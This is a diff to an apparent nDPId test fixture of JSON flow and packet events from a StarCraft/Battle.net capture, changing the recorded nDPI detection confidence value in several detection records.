@@ -60,24 +60,24 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1437389964518,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964518,"pkt":"hCYVPnXEIImEa8W6CABFAAA0bDFAAIAGrOPAqAFkrcJx4A2yAFD3XxLXAAAAAIACIABVKAAAAgQFtAEDAwgBAQQC"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1437389964552,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964552,"pkt":"IImEa8W6hCYVPnXECABFAAA0QI0AADUGY4itwnHgwKgBZABQDbI8Bg5O918S2IASp5SDTQAAAgQFlgEBBAIBAwMH"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1437389964552,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389964552,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDJAAIAGrO7AqAFkrcJx4A2yAFD3XxLYPAYOT1AQAQBqlgAA"} 
-00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964518,"flow_last_seen":1437389964552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":350,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1437389964552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/collect","code":0,"content_type":"","user_agent":"Battle.net\/1.3.0.5952"}} +00819{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964518,"flow_last_seen":1437389964552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":350,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1437389964552,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"},"http": {"hostname":"www.google-analytics.com","url":"www.google-analytics.com\/collect","code":0,"content_type":"","user_agent":"Battle.net\/1.3.0.5952"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964752,"flow_last_seen":1437389964752,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1437389964752,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1437389964752,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1437389964752,"pkt":"hCYVPnXEIImEa8W6CABFAAA\/X2UAAIARVpbAqAFkwKgB\/up6ADUAK3heAXYBAAABAAAAAAAABGxsbncIYmxpenphcmQDY29tAAABAAE="} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964752,"flow_last_seen":1437389964752,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1437389964752,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"llnw.blizzard.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964752,"flow_last_seen":1437389964752,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1437389964752,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1437389964783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1437389964783,"pkt":"hCYVPnXEIImEa8W6CABFAAA\/X2YAAIARVpXAqAFkwKgB\/up6ADUAK3heAXYBAAABAAAAAAAABGxsbncIYmxpenphcmQDY29tAAABAAE="} 
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1437389964788,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":144,"pkt_l4_len":110,"thread_ts_msec":1437389964788,"pkt":"IImEa8W6hCYVPnXECABFAACCAABAAEARtbjAqAH+wKgBZAA16noAbnPyAXaBgAABAAMAAAAABGxsbncIYmxpenphcmQDY29tAAABAAHADAAFAAEAAFQfABcIYmxpenphcmQCdm8FbGxud2QDbmV0AMAvAAEAAQAAATwABFf43f7ALwABAAEAAAE8AARX+N39"} -01037{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389964752,"flow_last_seen":1437389964788,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1437389964788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"87.248.221.254"}} 
+01037{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389964752,"flow_last_seen":1437389964788,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1437389964788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":60026,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"llnw.blizzard.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"87.248.221.254"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389964790,"flow_last_seen":1437389964790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389964790,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1437389964790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964790,"pkt":"hCYVPnXEIImEa8W6CABFAAA0FwlAAIAG67fAqAFkV\/jd\/g20AFApaAewAAAAAIAC\/\/838QAAAgQFtAEDAwgBAQQC"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1437389964848,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389964848,"pkt":"IImEa8W6hCYVPnXECABFAAA0tGpAAPUG2VVX+N3+wKgBZABQDbTA0NjuKWgHsYAS\/\/+fJQAAAgQFtAEDAwQEAgAA"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1437389964848,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389964848,"pkt":"hCYVPnXEIImEa8W6CABFAAAoFwpAAIAG68LAqAFkV\/jd\/g20AFApaAexwNDY71AQBADa8wAA"} 
-00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964790,"flow_last_seen":1437389964848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1437389964848,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":0,"content_type":"","user_agent":"Blizzard Web Client"}} -01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389964790,"flow_last_seen":1437389964921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1437389964921,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": 
{"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":200,"content_type":"application\/octet-stream","user_agent":"Blizzard Web Client"}} +00998{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389964790,"flow_last_seen":1437389964848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1437389964848,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":0,"content_type":"","user_agent":"Blizzard Web Client"}} +01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389964790,"flow_last_seen":1437389964921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1647,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1437389964921,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain 
name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"llnw.blizzard.com","url":"llnw.blizzard.com\/sc2-pod-retail\/AF11CD00\/EU\/24621.direct\/s2-36281-BA356DD57557728843CAF63A12C79AA3.mfil","code":200,"content_type":"application\/octet-stream","user_agent":"Blizzard Web Client"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389967432,"flow_last_seen":1437389967432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389967432,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1437389967432,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389967432,"pkt":"hCYVPnXEIImEa8W6CABFAAA0U2dAAIAG+pjAqAFkDIHeNg24AFDXJA2NAAAAAIACIACvkgAAAgQFtAEDAwgBAQQC"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1437389967630,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389967630,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAAC0GoQAMgd42wKgBZABQDbj6JMXG1yQNjoASFtD4xgAAAgQFtAEBBAIBAwMH"} 
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1437389967630,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389967630,"pkt":"hCYVPnXEIImEa8W6CABFAAAoU2hAAIAG+qPAqAFkDIHeNg24AFDXJA2O+iTFx1AQAQBPaQAA"} -00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389967432,"flow_last_seen":1437389967639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437389967639,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": {"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} +00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389967432,"flow_last_seen":1437389967639,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1437389967639,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"},"http": 
{"hostname":"us.scan.worldofwarcraft.com","url":"us.scan.worldofwarcraft.com\/update\/Launcher.txt","code":0,"content_type":"","user_agent":""}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968486,"flow_last_seen":1437389968486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968486,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1437389968486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968486,"pkt":"hCYVPnXEIImEa8W6CABFAAAoaD9AAIAGnzjAqAFkAuQuaA2kAbvjTIWjXKb5cVARAQDtEwAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968487,"flow_last_seen":1437389968487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968487,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -99,54 +99,54 @@ 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389968488,"flow_last_seen":1437389968488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389968488,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1437389968488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968488,"pkt":"hCYVPnXEIImEa8W6CABFAAAobDZAAIAGrOrAqAFkrcJx4A2cAbsxkmlKz83WwVARAP18ZAAA"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdOZFAADkGFKgC5C5ywKgBZAG7DZol2NSj+KyQXlAYAk8nagAAFQMCADAMud3SaYTsSqa\/uoo0a5E8VCc4Xkt3IWOikvjNzbZ6\/KN17SBOZ1wiAn+Wb8fZvA4="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968519,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968519,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968519,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWdAAIAG7gbAqAFkAuQucg2aAbv4rJBeJdjU2FAUAAApXQAA"} 
00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1437389968519,"pkt":"IImEa8W6hCYVPnXECABFAABdHrRAADkGL4UC5C5ywKgBZAG7DZfwJm7dzVFvfFAYAvbMYQAAFQMCADAisnLQsHrL1EoW2shNoX67xhkXstAI1yd6wVWuICpme1diCl2In\/GtYthhkjE1BS4="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968519,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1437389968519,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1437389968519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389968519,"pkt":"hCYVPnXEIImEa8W6CABFAAAoGWhAAIAG7gXAqAFkAuQucg2XAbvNUW988CZvElAUAAARFQAA"} 